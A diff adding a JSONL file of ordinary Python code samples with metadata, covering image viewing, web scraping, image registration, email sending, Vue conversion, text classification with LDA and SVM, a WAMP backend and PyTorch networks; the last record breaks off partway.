diff --git "a/054.jsonl" "b/054.jsonl"
new file mode 100644--- /dev/null
+++ "b/054.jsonl"
@@ -0,0 +1,425 @@
+{"seq_id": "601335951", "text": "\"\"\"\npython kzpy3/scratch/view_RPi_images.py\n\"\"\"\nfrom kzpy3.vis import *\nfrom matplotlib.animation import FuncAnimation\n\n\nn_frames = 3000\n\nc = 0\nctr = 0\n\ndef even_frames(frame_number):\n\tglobal c\n\tglobal ctr\n\t#print(frame_number)\n\n\tstart_time = time.time()\n\ttry:\n\t\t#c_new = os.path.getctime(opjD('image1.jpg'))\n\t\t#if c_new == c:\n\t\t#\tpass #print('waiting...')\n\t\t#else:\n\t\t#c = c_new\n\t\t#unix(d2n('cp ',opjD('image1.jpg '),' /Users/karlzipser/Desktop/RPi_images/',c_new,'.',ctr,'.jpg'),False)\n\t\t#ctr += 1\n\t\t#print ctr\n\t\timg = imread(opjD('image1.jpg'))\n\t\t#print(shape(img))\n\t\tif shape(img)[2] == 3:\n\t\t\tplt.clf()\n\t\t\tmi(img)\n\t\telse:\n\t\t\tprint('Empyt frame.')\n\texcept KeyboardInterrupt:\n\t\tprint('Quitting now.')\n\t\tsys.exit(1)\n\texcept:\n\t\tpass\n\t#if frame_number == n_frames-1:\n\t#\tplt.close()\n\n\nfig = plt.figure(1,figsize=(9,9))\n\nanimation = FuncAnimation(fig, even_frames, frames=n_frames, interval=30, repeat=False)\n\nplt.show()\n#input('adfa')\nprint('done....')", "sub_path": "scratch/view_RPi_images.py", "file_name": "view_RPi_images.py", "file_ext": "py", "file_size_in_byte": 949, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "matplotlib.animation.FuncAnimation", "line_number": 46, "usage_type": "call"}]}
+{"seq_id": "634636881", "text": "#coding:utf-8\nimport requests\nfrom bs4 import BeautifulSoup\nimport pickle\n\nreq = requests.get('https://docs.python.org/2/library/index.html')\nsoup = BeautifulSoup(req.text,\"lxml\")\nalist = []\nindex = {\"title\":'The Python Standard Library',\n \"url\":\"https://docs.python.org/2/library/index.html\"}\nalist.append(index)\nfor i in soup.find_all('li',attrs={'class':'toctree-l1'}):\n atags = i.find_all('a')\n for a in atags:\n til = a.get_text()\n url = 'https://docs.python.org/2/library/'+a.get('href')\n if '#' in url:\n continue\n art = {'title':til,'url':url}\n alist.append(art)\n\nf = open(r'C:\\Users\\jim\\Desktop\\dict.txt','w')\npickle.dump(alist,f)\n\nf.close()", "sub_path": "0000python/mobi_recipe/0recipe-pickle.py", "file_name": "0recipe-pickle.py", "file_ext": "py", "file_size_in_byte": 707, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "requests.get", "line_number": 6, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 7, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 23, "usage_type": "call"}]}
+{"seq_id": "605964154", "text": "import abc\nfrom PIL import Image, ImageTk\nimport numpy as np\nfrom typing import Tuple\n\n\nclass VComponent(abc.ABC):\n\n def __init__(self, row: int, column: int, size: Tuple[int, int]):\n self._functions = None\n self._row = row\n self._column = column\n self._width = size[0]\n self._height = size[1]\n\n @abc.abstractmethod\n def draw(self):\n pass\n\n def set_function(self, functions: dict, **kwargs):\n self._functions = functions\n\n @staticmethod\n def numpy_2_tkinter(img_raw: np.ndarray):\n img = ImageTk.PhotoImage(image=Image.fromarray(img_raw))\n\n return img\n", "sub_path": "view/view_component.py", "file_name": "view_component.py", "file_ext": "py", "file_size_in_byte": 632, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "abc.ABC", "line_number": 7, "usage_type": "attribute"}, {"api_name": "typing.Tuple", "line_number": 9, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 16, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 24, "usage_type": "attribute"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 25, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 25, "usage_type": "name"}, {"api_name": "PIL.Image.fromarray", "line_number": 25, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 25, "usage_type": "name"}]}
+{"seq_id": "161387583", "text": "from os.path import join\nimport argparse\nfrom tibtexts.ocrvol import OCRVol\n\nparser = argparse.ArgumentParser(description='Insert Milestones from OCR in Unicode Docs')\nparser.add_argument('-v', '--vol', required=True,\n help='The Volume Number')\nargs = parser.parse_args()\n\n\nif __name__ == \"__main__\":\n kwargs = vars(args)\n volnum = kwargs['vol']\n volfilenm = \"kama-ocr-vol-{}.txt\".format(str(volnum).zfill(3))\n volpath = join('resources', 'ocr', volfilenm)\n volobj = OCRVol(volpath)\n volobj.print_stats()\n", "sub_path": "find-bad-vol-pages.py", "file_name": "find-bad-vol-pages.py", "file_ext": "py", "file_size_in_byte": 542, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 5, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 15, "usage_type": "call"}, {"api_name": "tibtexts.ocrvol.OCRVol", "line_number": 16, "usage_type": "call"}]}
+{"seq_id": "81590969", "text": "import SimpleITK as sitk\nimport tifffile as tiff\nimport utils\n\nfixed = \"/media/store/krs/caseFiles/vwi_proc/case01/case_1_im_0000.tiff\"\n\nmoving = \"/media/store/krs/caseFiles/vwi_proc/case01/case_1_im_0001.tiff\"\n\nim_f = tiff.imread(fixed, key=4)\nim_t = tiff.imread(moving, key=4)\n# print(im_t.shape, im_f[:,:,:3].shape)\n#quit()\nspacing = ( 2.02, 2.02)\nf_sitk = utils.get_sitk_image(im_f, spacing = spacing)\n\nt_sitk = utils.get_sitk_image(im_t, spacing = spacing)\n\n# print(t_sitk)\n\n#numberOfChannels = 3\n\nelastix = sitk.ElastixImageFilter()\nelastix.SetFixedImage(f_sitk)\nelastix.SetMovingImage(t_sitk)\n\nprint('number of images:')\nprint( elastix.GetNumberOfFixedImages())\nprint( elastix.GetNumberOfMovingImages())\n\n# read parameter file from disk so we are using the same file as command line\n#elastix.SetParameterMap(elastix.ReadParameterFile('params_6.txt'))\nrigid = sitk.GetDefaultParameterMap(\"rigid\")\naffine = sitk.GetDefaultParameterMap(\"affine\")\nsitk.PrintParameterMap(rigid)\n#quit()\n#sitk.PrintParameterMap(affine)\nparameterMapVector = sitk.VectorOfParameterMap()\nparameterMapVector.append(rigid)\n#parameterMapVector.append(sitk.GetDefaultParameterMap(\"affine\"))\n#parameterMapVector.append(sitk.GetDefaultParameterMap(\"bspline\"))\nelastix.SetParameterMap(parameterMapVector)\n\nelastix.SetOutputDirectory('./result/')\nelastix.LogToConsoleOff()\nelastix.SetLogToFile(True)\n\nelastix.Execute()\n\nsitk.PrintParameterMap(elastix.GetTransformParameterMap())\n\nmoving_resampled = elastix.GetResultImage()\n\nutils.display_images(fixed_npa = sitk.GetArrayViewFromImage(f_sitk),\n moving_npa = sitk.GetArrayViewFromImage(moving_resampled))", "sub_path": "hist/test_elastix2.py", "file_name": "test_elastix2.py", "file_ext": "py", "file_size_in_byte": 1640, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "tifffile.imread", "line_number": 9, "usage_type": "call"}, {"api_name": "tifffile.imread", "line_number": 10, "usage_type": "call"}, {"api_name": "utils.get_sitk_image", "line_number": 14, "usage_type": "call"}, {"api_name": "utils.get_sitk_image", "line_number": 16, "usage_type": "call"}, {"api_name": "SimpleITK.ElastixImageFilter", "line_number": 22, "usage_type": "call"}, {"api_name": "SimpleITK.GetDefaultParameterMap", "line_number": 32, "usage_type": "call"}, {"api_name": "SimpleITK.GetDefaultParameterMap", "line_number": 33, "usage_type": "call"}, {"api_name": "SimpleITK.PrintParameterMap", "line_number": 34, "usage_type": "call"}, {"api_name": "SimpleITK.VectorOfParameterMap", "line_number": 37, "usage_type": "call"}, {"api_name": "SimpleITK.PrintParameterMap", "line_number": 49, "usage_type": "call"}, {"api_name": "utils.display_images", "line_number": 53, "usage_type": "call"}, {"api_name": "SimpleITK.GetArrayViewFromImage", "line_number": 53, "usage_type": "call"}, {"api_name": "SimpleITK.GetArrayViewFromImage", "line_number": 54, "usage_type": "call"}]}
+{"seq_id": "471531758", "text": "\"\"\" A simple server to send status update emails \"\"\"\nimport os\nimport smtplib\nimport imaplib\nimport email\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom email.mime.message import MIMEMessage\n\nclass EmailServer(object):\n def __init__(self, email_config):\n self.email_config = email_config\n self.EMAIL_ADDRESS = email_config['FROM_UID'] + email_config['EMAIL_ORG']\n self.FROM_PWD = email_config['FROM_PWD']\n self.SMTP_SERVER = email_config['SMTP_SERVER']\n self.SMTP_PORT = email_config['SMTP_PORT']\n # IMAP_SERVER = email_config['IMAP_SERVER']\n\n # set up to send emails\n\n def connect(self):\n self.sendserver = smtplib.SMTP(self.SMTP_SERVER, self.SMTP_PORT)\n self.sendserver.ehlo()\n self.sendserver.starttls()\n self.sendserver.ehlo()\n self.sendserver.login(self.EMAIL_ADDRESS, self.FROM_PWD)\n\n # set up to receive emails\n# self.inbox = imaplib.IMAP4_SSL(IMAP_SERVER)\n# self.inbox.login(self.EMAIL_ADDRESS, self.FROM_PWD)\n# self.inbox.select('inbox')\n\n def send_email(self, to, subject, body_text):\n self.connect()\n new = MIMEMultipart(\"mixed\")\n body = MIMEMultipart(\"alternative\")\n body.attach( MIMEText(\"{}\".format(body_text.encode('utf-8')), \"html\") )\n # body.attach( MIMEText(\"reply body text\", \"html\") )\n new.attach(body)\n\n new[\"Message-ID\"] = email.utils.make_msgid()\n new[\"Subject\"] = subject\n new[\"To\"] = to\n new[\"From\"] = self.EMAIL_ADDRESS\n\n self.sendserver.sendmail(self.EMAIL_ADDRESS, [new[\"To\"]], new.as_string())\n\n def quit(self):\n self.sendserver.quit()\n # self.inbox.quit()\n", "sub_path": "chainer_monitor/email_server.py", "file_name": "email_server.py", "file_ext": "py", "file_size_in_byte": 1772, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "smtplib.SMTP", "line_number": 22, "usage_type": "call"}, {"api_name": "email.mime.multipart.MIMEMultipart", "line_number": 35, "usage_type": "call"}, {"api_name": "email.mime.multipart.MIMEMultipart", "line_number": 36, "usage_type": "call"}, {"api_name": "email.mime.text.MIMEText", "line_number": 37, "usage_type": "call"}, {"api_name": "email.utils.make_msgid", "line_number": 41, "usage_type": "call"}, {"api_name": "email.utils", "line_number": 41, "usage_type": "attribute"}]}
+{"seq_id": "86000944", "text": "from bs4 import BeautifulSoup\n\n\nimport glob\nimport os\nimport sys\n\n\ndef main(export_path):\n os.chdir(export_path)\n\n for html_file in glob.glob(\"**/*.html\", recursive=True):\n # HTML\n html_file_handle = open(html_file, \"r+\")\n html_soup = BeautifulSoup(html_file_handle, \"html.parser\")\n html_body = html_soup.find(\"body\")\n\n html_wrapper = html_soup.new_tag(\"div\")\n\n for html_tag in reversed(html_body.contents):\n html_wrapper.insert(0, html_tag.extract())\n\n html_body.append(html_wrapper)\n\n [script.extract() for script in html_soup.findAll(\"script\")]\n html_body.name = \"template\"\n html_file_handle.close()\n\n # CSS\n css_clean_name = html_file.split('\\\\')[-1].replace('.html', '.css')\n css_soup = None\n\n try:\n css_file_handle = open(f\"./assets/css/{css_clean_name}\", \"r+\")\n css_soup = BeautifulSoup(css_file_handle, \"html.parser\")\n css_file_handle.close()\n except:\n css_soup = BeautifulSoup(\"\", \"html.parser\")\n\n # Vue\n vue_soup = []\n vue_style_tags = []\n\n try:\n vue_file_handle = open(f\"{html_file.split('.')[0]}.vue\", \"r+\")\n vue_soup = BeautifulSoup(vue_file_handle, \"html.parser\")\n vue_style_tags = vue_soup.findAll(\"style\")\n except:\n vue_soup = BeautifulSoup(\"\", \"html.parser\")\n\n if len(vue_soup) > 0:\n if len(vue_style_tags) > 0:\n style_wrapper = vue_soup.new_tag(\"style\")\n\n for style in reversed(css_soup.contents):\n style_wrapper.insert(0, style.extract())\n\n vue_style_tags[0].extract()\n vue_soup.append(style_wrapper)\n\n vue_template_tags = vue_soup.findAll(\"template\")\n\n if len(vue_template_tags) > 0:\n vue_template_tags[0].replaceWith(html_body)\n else:\n vue_soup.insert(0, BeautifulSoup(\n \"\", \"html.parser\"))\n vue_soup.insert(1, html_body)\n\n vue_file_handle.close()\n vue_file_handle = open(f\"{html_file.split('.')[0]}.vue\", \"w+\")\n vue_file_handle.write(vue_soup.prettify(formatter=\"html5\"))\n vue_file_handle.close()\n else:\n vue_file_handle = open(f\"{html_file.split('.')[0]}.vue\", \"w+\")\n vue_soup = BeautifulSoup(vue_file_handle, \"html.parser\")\n vue_soup.insert(0, BeautifulSoup(\"\", \"html.parser\"))\n vue_soup.insert(1, html_body)\n vue_soup.append(BeautifulSoup(\n \"\", \"html.parser\"))\n vue_soup.append(BeautifulSoup(\n f\"\", \"html.parser\"))\n vue_file_handle.write(vue_soup.prettify(formatter=\"html5\"))\n vue_file_handle.close()\n\n os.remove(html_file)\n\n return\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 2:\n main(sys.argv[1])\n else:\n print(f\"Usage: {sys.argv[0]} export_path\")\n", "sub_path": "vueify.py", "file_name": "vueify.py", "file_ext": "py", "file_size_in_byte": 3159, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "os.chdir", "line_number": 10, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 12, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 15, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 35, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 38, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 46, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 49, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 66, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 76, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 77, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 79, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 81, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 86, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 92, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 93, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 95, "usage_type": "attribute"}]}
+{"seq_id": "651679291", "text": "# Copyright (c) 2022 Graphcore Ltd. All rights reserved.\nimport popxl\nimport popxl.ops as ops\nimport numpy as np\nimport pytest\nimport popart._internal.ir as _ir\nfrom utils import contains_op_of_type\n\n\nclass TestConv:\n @pytest.mark.parametrize(\n \"pad_type\", (\"not_set\", \"same_upper\", \"same_lower\", \"valid\")\n )\n def test_fn(self, pad_type):\n batch_size = 1\n in_channel = 4\n out_channel = 4\n height = 1\n width = 1\n h_kernel = 1\n w_kernel = 1\n strides = (1, 1)\n pads = (0, 0, 0, 0)\n dilations = (1, 1)\n group = 1\n ir = popxl.Ir()\n g = ir.main_graph\n with ir.main_graph:\n t = popxl.variable(np.random.rand(batch_size, in_channel, height, width))\n weight = popxl.variable(\n np.random.rand(out_channel, int(in_channel / group), h_kernel, w_kernel)\n )\n _ = ops.conv(t, weight, strides, pads, dilations, group, pad_type)\n assert len(g.tensors) == 3\n assert len(g.variables) == 2\n assert contains_op_of_type(\"Conv\", _ir.op.ConvOp, g)\n", "sub_path": "tests/unittests/python/popxl/ops/test_conv.py", "file_name": "test_conv.py", "file_ext": "py", "file_size_in_byte": 1118, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "popxl.Ir", "line_number": 26, "usage_type": "call"}, {"api_name": "popxl.variable", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 29, "usage_type": "attribute"}, {"api_name": "popxl.variable", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 31, "usage_type": "attribute"}, {"api_name": "popxl.ops.conv", "line_number": 33, "usage_type": "call"}, {"api_name": "popxl.ops", "line_number": 33, "usage_type": "name"}, {"api_name": "utils.contains_op_of_type", "line_number": 36, "usage_type": "call"}, {"api_name": "popart._internal.ir.op", "line_number": 36, "usage_type": "attribute"}, {"api_name": "popart._internal.ir", "line_number": 36, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 11, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 11, "usage_type": "attribute"}]}
+{"seq_id": "443357830", "text": "from __future__ import unicode_literals\n\nimport pickle\nimport random\nimport sys\nimport time\n\nimport gensim\nimport hazm\nfrom sklearn import svm\n\ndic_data = dict()\n\n\nclass SupervisedData:\n def __init__(self, dat, lab):\n self.data = dat\n self.label = lab\n self.topics = None\n\n\ndef stem_data(dat):\n normalizer = hazm.Normalizer()\n dat = normalizer.normalize(dat)\n sent = hazm.sent_tokenize(dat)\n\n words = []\n\n for s in sent:\n tagged = list(tagger.tag(hazm.word_tokenize(s)))\n new_tag = list(tagged)\n\n for token in tagged:\n if token[0] in stop_words:\n new_tag.remove(token)\n\n lemmatizer = hazm.Lemmatizer()\n for token in new_tag:\n\n stemmed = lemmatizer.lemmatize(token[0], pos=token[1])\n stemmer = hazm.Stemmer()\n stemmed = stemmer.stem(stemmed)\n if len(stemmed) > 0 and ('#' not in stemmed):\n words.append(stemmed)\n\n return words\n\n\nif __name__ == '__main__':\n start_time = time.time()\n DATA_SIZE = 72000\n TRAIN_SIZE = 43200\n VALIDATION_SIZE = 14400\n TEST_SIZE = 14400\n\n # code for first time\n data_addr = sys.argv[1]\n label_addr = sys.argv[2]\n\n # comment this part if you have saved objects\n tagger = hazm.POSTagger(model='resources/postagger.model')\n stop_words = open('files/stopwords-fa.txt', 'r', encoding='utf-8').read().split('\\n')\n\n # file = open(data_addr, 'r', encoding='utf-8')\n file = open('data/train.content', 'r', encoding='utf-8')\n content = file.read().split('\\n')\n\n # file = open(label_addr, 'r', encoding='utf-8')\n file = open('data/train.label', 'r', encoding='utf-8')\n tag = file.read().split('\\n')\n\n datas = list()\n docs_words = []\n\n for i in range(DATA_SIZE + 1):\n paraph = content[i]\n datas.append(SupervisedData(content[i], tag[i]))\n docs_words.append(stem_data(content[i]))\n\n # saving objects\n pickle_out = open(\"files/docs_words.pickle\", \"wb\")\n pickle.dump(docs_words, pickle_out)\n pickle_out.close()\n\n # saving objects\n pickle_out = open(\"files/datas.pickle\", \"wb\")\n pickle.dump(datas, pickle_out)\n pickle_out.close()\n\n dictionary = gensim.corpora.Dictionary(docs_words)\n dictionary.save('files/lda_dictionary.dict')\n\n corpus = [dictionary.doc2bow(text) for text in docs_words]\n\n ldamodel = gensim.models.ldamodel.LdaModel(corpus, num_topics=100, id2word=dictionary, passes=50)\n ldamodel.save('files/lda.model')\n\n '''\n # load saved objects\n ldamodel = gensim.models.LdaModel.load('files/lda.model')\n dictionary = gensim.corpora.Dictionary.load('files/lda_dictionary.dict')\n pickle_in = open(\"files/datas.pickle\", \"rb\")\n datas = pickle.load(pickle_in)\n\n pickle_in = open(\"files/docs_words.pickle\", \"rb\")\n docs_words = pickle.load(pickle_in)\n '''\n\n for i in range(DATA_SIZE + 1):\n tpcs = [0 for x in range(100)]\n for item in ldamodel.get_document_topics(dictionary.doc2bow(docs_words[i])):\n tpcs[item[0]] = item[1]\n datas[i].topics = tpcs\n\n # shuffle data for picking train, validation and test data\n random.shuffle(datas)\n\n # saving objects\n pickle_out = open(\"files/random_datas.pickle\", \"wb\")\n pickle.dump(datas, pickle_out)\n pickle_out.close()\n\n '''\n pickle_in = open(\"files/random_datas.pickle\", \"rb\")\n datas = pickle.load(pickle_in)\n '''\n\n train_set = datas[:TRAIN_SIZE]\n validation_set = datas[TRAIN_SIZE + 1:TRAIN_SIZE + VALIDATION_SIZE + 1]\n test_set = datas[TRAIN_SIZE + VALIDATION_SIZE + 1:]\n\n # comment part above after saving objects for model learning and division\n\n # SVM chapter\n X = [d.topics for d in train_set] # list of features for each data\n y = [d.label for d in train_set] # list of labels\n print(X)\n print(y)\n # Create the SVC model object\n C = 1.0 # SVM regularization parameter\n svc = svm.SVC(kernel='rbf', C=C, decision_function_shape='ovr').fit(X, y)\n\n # saving svm model\n pickle_out = open(\"files/svm.pickle\", \"wb\")\n pickle.dump(svc, pickle_out)\n pickle_out.close()\n\n print('time: ', time.time() - start_time, \"s\")\n", "sub_path": "hw2.py", "file_name": "hw2.py", "file_ext": "py", "file_size_in_byte": 4198, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "hazm.Normalizer", "line_number": 23, "usage_type": "call"}, {"api_name": "hazm.sent_tokenize", "line_number": 25, "usage_type": "call"}, {"api_name": "hazm.word_tokenize", "line_number": 30, "usage_type": "call"}, {"api_name": "hazm.Lemmatizer", "line_number": 37, "usage_type": "call"}, {"api_name": "hazm.Stemmer", "line_number": 41, "usage_type": "call"}, {"api_name": "time.time", "line_number": 50, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 57, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 58, "usage_type": "attribute"}, {"api_name": "hazm.POSTagger", "line_number": 61, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 82, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 87, "usage_type": "call"}, {"api_name": "gensim.corpora.Dictionary", "line_number": 90, "usage_type": "call"}, {"api_name": "gensim.corpora", "line_number": 90, "usage_type": "attribute"}, {"api_name": "gensim.models.ldamodel.LdaModel", "line_number": 95, "usage_type": "call"}, {"api_name": "gensim.models", "line_number": 95, "usage_type": "attribute"}, {"api_name": "random.shuffle", "line_number": 116, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 120, "usage_type": "call"}, {"api_name": "sklearn.svm.SVC", "line_number": 141, "usage_type": "call"}, {"api_name": "sklearn.svm", "line_number": 141, "usage_type": "name"}, {"api_name": "pickle.dump", "line_number": 145, "usage_type": "call"}, {"api_name": "time.time", "line_number": 148, "usage_type": "call"}]}
+{"seq_id": "286307028", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom autobahn import wamp\nfrom autobahn.twisted.wamp import ApplicationSession, ApplicationRunner\nfrom twisted.internet.defer import inlineCallbacks\nfrom autobahn.twisted.websocket import WebSocketServerProtocol\n\nfrom welcome import Hello\n\n\nclass PeriocularBackend(ApplicationSession):\n\n def __init__(self, config):\n ApplicationSession.__init__(self, config)\n \n \n @wamp.register(u'com.periocular.welcome')\n def welcome(self):\n hy = Hello()\n hy.hello()\n \n\n\n @inlineCallbacks\n def onJoin(self, details):\n res = yield self.register(self)\n print(\"PeriocularBackend: {} procedimentos registrados!\".format(len(res)))\n try:\n # Publicando Welcome\n print(\"Publicando Welcome...\")\n self.publish(u'com.periocular.welcome')\n estado = self.subscribe(u'com.periocular.android') # se inscrevendo em topico android\n print(\"Resultado da inscrição {}\".format(estado))\n\n except Exception as exception:\n print(\"Erro na publicação: {}\".format(exception))\n\n\ndef main():\n\n # Crossbar.io connection configuration\n url = u'ws://localhost:8080/ws'\n realm = u'roteador-crossbar'\n\n # now actually run a WAMP client using our session class ClientSession\n runner = ApplicationRunner(url, realm)\n runner.run(PeriocularBackend, auto_reconnect=True)\n\n\nif __name__ == \"__main__\":\n main()\n", "sub_path": "roteador.py", "file_name": "roteador.py", "file_ext": "py", "file_size_in_byte": 1475, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "autobahn.twisted.wamp.ApplicationSession", "line_number": 12, "usage_type": "name"}, {"api_name": "autobahn.twisted.wamp.ApplicationSession.__init__", "line_number": 15, "usage_type": "call"}, {"api_name": "autobahn.twisted.wamp.ApplicationSession", "line_number": 15, "usage_type": "name"}, {"api_name": "welcome.Hello", "line_number": 20, "usage_type": "call"}, {"api_name": "autobahn.wamp.register", "line_number": 18, "usage_type": "call"}, {"api_name": "autobahn.wamp", "line_number": 18, "usage_type": "name"}, {"api_name": "twisted.internet.defer.inlineCallbacks", "line_number": 25, "usage_type": "name"}, {"api_name": "autobahn.twisted.wamp.ApplicationRunner", "line_number": 47, "usage_type": "call"}]}
+{"seq_id": "202993219", "text": "from collections import deque\n \ninfile = open('components.in', 'r')\noutfile = open('components.out', 'w')\n \nn,e = [int(i) for i in infile.readline().split()] \n \n#edgelist\nedges=[] \nfor i in range(e):\n edges.append([int(j) for j in infile.readline().split()])\n \n#neighbours\nfrom collections import defaultdict\nneighbours = defaultdict(lambda: defaultdict(lambda: 0))\nfor v1, v2 in edges:\n neighbours[v1][v2] += 1\n neighbours[v2][v1] += 1\n \ndef dfs():\n num_component ={}\n comp = 0\n for i in range(1, n+1):\n if i not in num_component:\n comp += 1\n num_component[i] = comp\n queue = deque([i])\n while len(queue) > 0:\n for v in neighbours[queue[0]]:\n if v not in num_component:\n num_component[v] = comp\n queue.append(v)\n queue.popleft()\n outfile.write(str(comp)+ '\\n')\n for i in num_component.values():\n outfile.write(str(i)+' ')\ndfs()\n \n \ninfile.close()\noutfile.close()", "sub_path": "sergeeva/graphs/comp.py", "file_name": "comp.py", "file_ext": "py", "file_size_in_byte": 1040, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "collections.defaultdict", "line_number": 15, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 27, "usage_type": "call"}]}
+{"seq_id": "482766042", "text": "import torch\nimport visdom\nimport matplotlib.pyplot as plt\n\nN, D_in, H, D_out = 64, 1000, 100, 10\n\ndevice = torch.device(\"cuda:1\")\n# device = torch.device(\"cpu\")\n\nx = torch.rand(N, D_in, device=device)\ny = torch.rand(N, D_out, device=device)\n\ndef default_NN():\n # 利用torch.nn.Sequential搭建的级联网络\n model = torch.nn.Sequential(\n torch.nn.Linear(D_in, H),\n torch.nn.ReLU(),\n torch.nn.Linear(H, D_out), )\n\n if device.type != 'cpu':\n model = model.cuda(device=device)\n loss_func = torch.nn.MSELoss(size_average=False)\n\n lr = 1e-4\n optimizer = torch.optim.Adam(model.parameters(), lr=lr)\n\n for step in range(5000):\n y_pred = model(x)\n loss = loss_func(y_pred, y)\n print(step, loss.data.cpu().numpy())\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n return model\n\n\n\n\ndef selfBuild_NN():\n # 通过自建class构建神经网络\n class TwoLayerNet(torch.nn.Module):\n def __init__(self,D_in, H, D_out):\n super(TwoLayerNet, self).__init__()\n self.linear1 = torch.nn.Linear(D_in, H)\n self.linear2 = torch.nn.Linear(H, D_out)\n\n def forward(self, x):\n h_relu = self.linear1(x).clamp(min=0)\n relu_func = torch.nn.ReLU()\n y_pred = self.linear2(relu_func(h_relu))\n return y_pred\n\n # instance self-build nn\n model = TwoLayerNet(D_in, H, D_out)\n if device.type != 'cpu':\n model = model.cuda(device=device)\n loss_func = torch.nn.MSELoss(size_average=False)\n optimizer = torch.optim.SGD(model.parameters(), lr=1e-4)\n\n for step in range(5000):\n y_pred = model(x)\n loss = loss_func(y_pred, y)\n print(step, loss.item())\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n return model\n\n\n\n\n\n\nif __name__ == '__main__':\n # selfBuild_NN()\n vis = visdom.Visdom(env=u'test1')\n\n x = torch.arange(1, 30, 0.01)\n y = torch.sin(x)\n vis.line(X=x, Y=y, win='sinx', opts={'title': 'y=sin(x)'})\n\n\n\n", "sub_path": "torch_basic_NN.py", "file_name": "torch_basic_NN.py", "file_ext": "py", "file_size_in_byte": 2073, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "torch.device", "line_number": 7, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 10, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 11, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 15, "usage_type": "attribute"}, {"api_name": "torch.nn.Linear", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 16, "usage_type": "attribute"}, {"api_name": "torch.nn.ReLU", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 17, "usage_type": "attribute"}, {"api_name": "torch.nn.Linear", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 18, "usage_type": "attribute"}, {"api_name": "torch.nn.MSELoss", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 22, "usage_type": "attribute"}, {"api_name": "torch.optim.Adam", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 25, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 43, "usage_type": "attribute"}, {"api_name": "torch.nn.Linear", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 46, "usage_type": "attribute"}, {"api_name": "torch.nn.Linear", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 47, "usage_type": "attribute"}, {"api_name": "torch.nn.ReLU", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.nn", 